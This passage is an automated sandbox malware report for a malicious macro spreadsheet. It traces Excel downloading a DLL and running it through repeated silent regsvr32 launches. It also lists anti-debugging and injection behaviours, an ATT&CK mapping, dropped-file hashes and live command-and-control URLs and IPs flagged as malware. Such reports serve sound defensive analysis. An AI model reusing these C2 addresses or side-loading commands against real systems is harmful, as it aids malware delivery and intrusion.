                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_002627C2 FindFirstFileW,11_2_002627C2
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004BC5B LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,3_2_1004BC5B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A32AC mov eax, dword ptr fs:[00000030h]3_2_001A32AC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002332AC mov eax, dword ptr fs:[00000030h]4_2_002332AC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003032AC mov eax, dword ptr fs:[00000030h]5_2_003032AC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D32AC mov eax, dword ptr fs:[00000030h]6_2_008D32AC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E32AC mov eax, dword ptr fs:[00000030h]9_2_001E32AC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_002632AC mov eax, dword ptr fs:[00000030h]10_2_002632AC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_002432AC mov eax, dword ptr fs:[00000030h]11_2_002432AC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003B437 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_1003B437
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10008DE0 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,memcpy,3_2_10008DE0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10049029 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_10049029
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10041ACF _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_10041ACF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10048DD7 SetUnhandledExceptionFilter,__encode_pointer,3_2_10048DD7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10048DF9 __decode_pointer,SetUnhandledExceptionFilter,3_2_10048DF9

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 135.148.121.246 144Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akqqkkcyjpzjtkdl\yjsihfoifzocxh.bje"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Jlwcmhlugcekbvod\wgwqcgkqco.zkn"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjoyn\vwxqtwr.dtt"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fypgzmyquzzcde\otyatzrmngwq.ngt"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bwfagqlayjve\vhxv.yyo"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wajwuevzvdakzef\rsarmrhrfymvh.bdv"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qqnrprjtrrtdhqc\hwfqlqeqb.xee"Jump to behavior
                        Source: Yara matchFile source: app.xml, type: SAMPLE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,3_2_1004D1C2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,3_2_1002583F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,3_2_100504E2
                        Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004C93C cpuid 3_2_1004C93C
                        Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10048CD7 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_10048CD7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10047887 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,3_2_10047887
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003CEE0 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,GetCurrentThreadId,__freeptd,3_2_1003CEE0

                        Stealing of Sensitive Information

                        Source: Yara matchFile source: 9.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.regsvr32.exe.1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.7e0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.regsvr32.exe.160000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.regsvr32.exe.200000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.regsvr32.exe.1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.230000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.regsvr32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.regsvr32.exe.1a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.regsvr32.exe.300000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.regsvr32.exe.260000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.8d0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.regsvr32.exe.240000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.7e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.regsvr32.exe.230000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.regsvr32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.regsvr32.exe.150000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.711848571.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.451639810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1002847B bind, 3_2_1002847B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10010ED0 PeekMessageA, SendMessageA, _memset, recv, htons, SendMessageA, inet_ntoa, inet_ntoa, SendMessageA, inet_ntoa, SendMessageA, SendMessageA, htons, htons, SendMessageA, htons, SendMessageA, SendMessageA, SendMessageA, PeekMessageA, closesocket, socket, _memset, gethostbyname, inet_ntoa, inet_addr, setsockopt, htons, bind, WSAIoctl, closesocket, 3_2_10010ED0
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 21 Scripting; 1 Native API; 42 Exploitation for Client Execution; At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: 1 Access Token Manipulation; 111 Process Injection; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 21 Scripting; 2 Obfuscated Files or Information; 131 Masquerading; 1 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 111 Process Injection; 1 Hidden Files and Directories
Credential Access: 21 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 3 File and Directory Discovery; 37 System Information Discovery; 1 Query Registry; 21 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: 1 Archive Collected Data; 21 Input Capture; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: 2 Ingress Tool Transfer; 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: 1 System Shutdown/Reboot; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
Behavior Graph ID: 578182, Sample: Documento.xlsm, Startdate: 24/02/2022, Architecture: WINDOWS, Score: 100

DNS/IP info: 129.232.188.93 (xneeloZA, South Africa); 203.114.109.124 (TOT-LLI-AS-APTOTPublicCompanyLimitedTH, Thailand); 42 other IPs or domains
Signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Antivirus detection for URL or domain; 13 other signatures

Process chain:
EXCEL.EXE (64, 24) started
  DNS/IP info: www.swaong.com; waws-prod-dm1-143.sip.azurewebsites.windows.net; swaong-home.azurewebsites.net
  Dropped: C:\Users\user\xxw1.ocx, PE32; C:\Users\...\BRqk58WkNweubruYwrLOt[1].dll, PE32; C:\Users\user\Desktop\~$Documento.xlsm, data
  Signatures: Document exploit detected (creates forbidden files); Document exploit detected (UrlDownloadToFile)
  regsvr32.exe (2) started
    Dropped: C:\Windows\...\qzdpzpnlmhwmidn.sqj (copy), PE32
    Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
    regsvr32.exe (1) started
      Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
      regsvr32.exe (1) started
        Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
        regsvr32.exe (1) started
          Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
          regsvr32.exe (1) started
            Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
            regsvr32.exe (1) started
              Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
              regsvr32.exe (1) started
                Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                regsvr32.exe (1) started
                  Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                  regsvr32.exe (2) started
                    DNS/IP info: 135.148.121.246, 49168, 8080 (AVAYAUS, United States)
                    Signature: System process connects to network (likely due to code injection or exploit)

Source | Detection | Scanner | Label | Link
Documento.xlsm | 40% | Virustotal | | Browse
Documento.xlsm | 40% | ReversingLabs | Document-Office.Downloader.Encdoc |

No Antivirus matches

Source | Detection | Scanner | Label | Link | Download
10.2.regsvr32.exe.260000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
11.2.regsvr32.exe.240000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
3.2.regsvr32.exe.1a0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
8.2.regsvr32.exe.190000.0.unpack | 100% | Avira | HEUR/AGEN.1145233 | | Download File
9.2.regsvr32.exe.1e0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
7.2.regsvr32.exe.200000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
7.2.regsvr32.exe.180000.0.unpack | 100% | Avira | HEUR/AGEN.1145233 | | Download File
4.2.regsvr32.exe.230000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
11.2.regsvr32.exe.1d0000.0.unpack | 100% | Avira | HEUR/AGEN.1145233 | | Download File
8.2.regsvr32.exe.1e0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
3.2.regsvr32.exe.160000.0.unpack | 100% | Avira | HEUR/AGEN.1145233 | | Download File
5.2.regsvr32.exe.300000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
9.2.regsvr32.exe.190000.0.unpack | 100% | Avira | HEUR/AGEN.1145233 | | Download File
6.2.regsvr32.exe.8d0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
6.2.regsvr32.exe.7e0000.0.unpack | 100% | Avira | HEUR/AGEN.1145233 | | Download File
10.2.regsvr32.exe.230000.0.unpack | 100% | Avira | HEUR/AGEN.1145233 | | Download File
4.2.regsvr32.exe.1c0000.0.unpack | 100% | Avira | HEUR/AGEN.1145233 | | Download File
5.2.regsvr32.exe.150000.0.unpack | 100% | Avira | HEUR/AGEN.1145233 | | Download File

Source | Detection | Scanner | Label | Link
www.swaong.com | 5% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe |
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe |
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe |
https://135.148.121.246/j | 100% | Avira URL Cloud | malware |
https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwiccH~A | 100% | Avira URL Cloud | malware |
https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwot~H | 100% | Avira URL Cloud | malware |
http://ocsp.entrust.net0D | 0% | URL Reputation | safe |
http://ocsp.entrust.net03 | 0% | URL Reputation | safe |
https://135.148.121.246/b | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.swaong.com | unknown | unknown | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://135.148.121.246/j | regsvr32.exe, 0000000B.00000002.711970606.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwiccH~A | regsvr32.exe, 0000000B.00000002.711992789.00000000004E0000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwot~H | regsvr32.exe, 0000000B.00000002.711992789.00000000004E0000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://crl.entrust.net/server1.crl0 | regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ocsp.entrust.net0D | regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ocsp.entrust.net03 | regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://secure.comodo.com/CPS0 | regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.entrust.net/2048ca.crl0 | regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://135.148.121.246/b | regsvr32.exe, 0000000B.00000002.711970606.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 578182
Start date: 24.02.2022
Start time: 13:53:10
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 34s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Documento.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSM@19/11@1/45
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 35.5% (good quality ratio 34%)
• Quality average: 75.3%
• Quality standard deviation: 25.4%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 127
• Number of non-executed functions: 278
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Changed system and user locale, location and keyboard layout to Italian - Italy
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
• Excluded IPs from analysis (whitelisted): 40.113.204.88, 173.222.108.210, 173.222.108.226
• Excluded domains from analysis (whitelisted): waws-prod-dm1-143.cloudapp.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
13:53:30 | API Interceptor | 506x Sleep call for process: regsvr32.exe modified
                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              195.154.133.20d6DeL6cknP.dllGet hashmaliciousBrowse
                                CeKgLGF1Tb.dllGet hashmaliciousBrowse
                                  3pWWnQj8Tl.dllGet hashmaliciousBrowse
                                    d8BSu9cmyR.dllGet hashmaliciousBrowse
                                      HmcWSfD1nj.dllGet hashmaliciousBrowse
                                        XIjxexgAaA.dllGet hashmaliciousBrowse
                                          MDQcLDzNkn.dllGet hashmaliciousBrowse
                                            kvB0rO5hGC.dllGet hashmaliciousBrowse
                                              5MRdHqTI6h.dllGet hashmaliciousBrowse
                                                wZjcwGe2Ig.dllGet hashmaliciousBrowse
                                                  tmCYqAk7Pe.dllGet hashmaliciousBrowse
                                                    4Nbbmh92u0.dllGet hashmaliciousBrowse
                                                      cvNo36hSX08HcKblNvSOy.dllGet hashmaliciousBrowse
                                                        Ds8oyqwmawCIBaPnL8kACN1KhbDRMZ2B.dllGet hashmaliciousBrowse
                                                          ha23tmmqXf3ZPwkbb.dllGet hashmaliciousBrowse
                                                            jKpbCOfhGg1RRP.dllGet hashmaliciousBrowse
                                                              LJzRHsJ8Eg.dllGet hashmaliciousBrowse
                                                                KDbFxA40o9tAFDX9JJvwcCr0Qbwk.dllGet hashmaliciousBrowse
                                                                  klj7HiM3FcL8X83kS3JgE.dllGet hashmaliciousBrowse
                                                                    QTl6xoPjYe.dllGet hashmaliciousBrowse
                                                                      185.157.82.211d6DeL6cknP.dllGet hashmaliciousBrowse
                                                                        CeKgLGF1Tb.dllGet hashmaliciousBrowse
                                                                          3pWWnQj8Tl.dllGet hashmaliciousBrowse
                                                                            d8BSu9cmyR.dllGet hashmaliciousBrowse
                                                                              HmcWSfD1nj.dllGet hashmaliciousBrowse
                                                                                XIjxexgAaA.dllGet hashmaliciousBrowse
                                                                                  MDQcLDzNkn.dllGet hashmaliciousBrowse
                                                                                    kvB0rO5hGC.dllGet hashmaliciousBrowse
                                                                                      5MRdHqTI6h.dllGet hashmaliciousBrowse
                                                                                        wZjcwGe2Ig.dllGet hashmaliciousBrowse
                                                                                          tmCYqAk7Pe.dllGet hashmaliciousBrowse
                                                                                            4Nbbmh92u0.dllGet hashmaliciousBrowse
                                                                                              cvNo36hSX08HcKblNvSOy.dllGet hashmaliciousBrowse
                                                                                                Ds8oyqwmawCIBaPnL8kACN1KhbDRMZ2B.dllGet hashmaliciousBrowse
                                                                                                  ha23tmmqXf3ZPwkbb.dllGet hashmaliciousBrowse
                                                                                                    jKpbCOfhGg1RRP.dllGet hashmaliciousBrowse
                                                                                                      LJzRHsJ8Eg.dllGet hashmaliciousBrowse
                                                                                                        KDbFxA40o9tAFDX9JJvwcCr0Qbwk.dllGet hashmaliciousBrowse
                                                                                                          klj7HiM3FcL8X83kS3JgE.dllGet hashmaliciousBrowse
                                                                                                            QTl6xoPjYe.dllGet hashmaliciousBrowse
                                                                                                              No context
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              No context
                                                                                                              No context
                                                                                                              Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                                                                                              Category:dropped
                                                                                                              Size (bytes):61414
                                                                                                              Entropy (8bit):7.995245868798237
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                                                                                              MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                                                                                              SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                                                                                              SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                                                                                              SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                                                                                              Malicious:false
                                                                                                              Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):328
                                                                                                              Entropy (8bit):3.1244568012511515
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:kKul7k8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:y79kPlE99SNxAhUeYlUSA/t
                                                                                                              MD5:671B807D13FE23FEE6DF64B38528BB0C
                                                                                                              SHA1:592E27305221E4E6BFBBA9DCE9C83BDC5B368065
                                                                                                              SHA-256:0674E472EFA7A3E2F7B818119807CE4B177B11016E145022D0741005D8814B24
                                                                                                              SHA-512:DEBD23519ED0683349E5D939E62B9913D76F3F68B14BA314D2E350261F07140FDDBD5FA1BF283E40D9C993415EE62609149DEBA0DF4203B98B02A1F654998814
                                                                                                              Malicious:false
                                                                                                              Preview:p...... ..........D..)..(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):679936
                                                                                                              Entropy (8bit):6.910563837671393
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:Z6ZLutvgrwV8RQc5W1yS0ezL9J6XKTe/vyzfANcN/kJhXx5y:qza8RQc5W1P0Q9sXKTLzflBkn
                                                                                                              MD5:9B303820618ADC4A4828E9E689F73562
                                                                                                              SHA1:64F1453A3E556F6625251D4460EC035257A4E25F
                                                                                                              SHA-256:AB3BC9CFB110ECD8DA508576F02C22947A008FBB28CE1C4C46741044BF359C8B
                                                                                                              SHA-512:35612714A9C29879848E7C6F2D82713EB1F68BE5D7A22449E1560E95A6E002A600873D8C867E6A617F9D40E427273458E2948EAFE8B59C2D1C2E51A572EAE15A
                                                                                                              Malicious:true
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 2418x1051, frames 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):197770
                                                                                                              Entropy (8bit):7.489581655824389
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:TysPlevgOrNeduXWNOYYYYYYYYYYYYYYYYYYYYYY+:TrPU4xduGB
                                                                                                              MD5:87E4C080D9EBE408EF871B68B9C9AA61
                                                                                                              SHA1:C2C39756608C8452892C1911C95313B944CE7231
                                                                                                              SHA-256:C8BE21BAC10998180168DEE76FF5095D723E6CC0D09AE69161926E3CBAB36441
                                                                                                              SHA-512:05AA79FC0272B38C977671900031AAB19476EF900209766F0DB2918C391B7607E14A66D677386AC1CC6D13F0FC3852C39C1A7DB3CDD6E10F0CB4C3B364C288D5
                                                                                                              Malicious:false
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
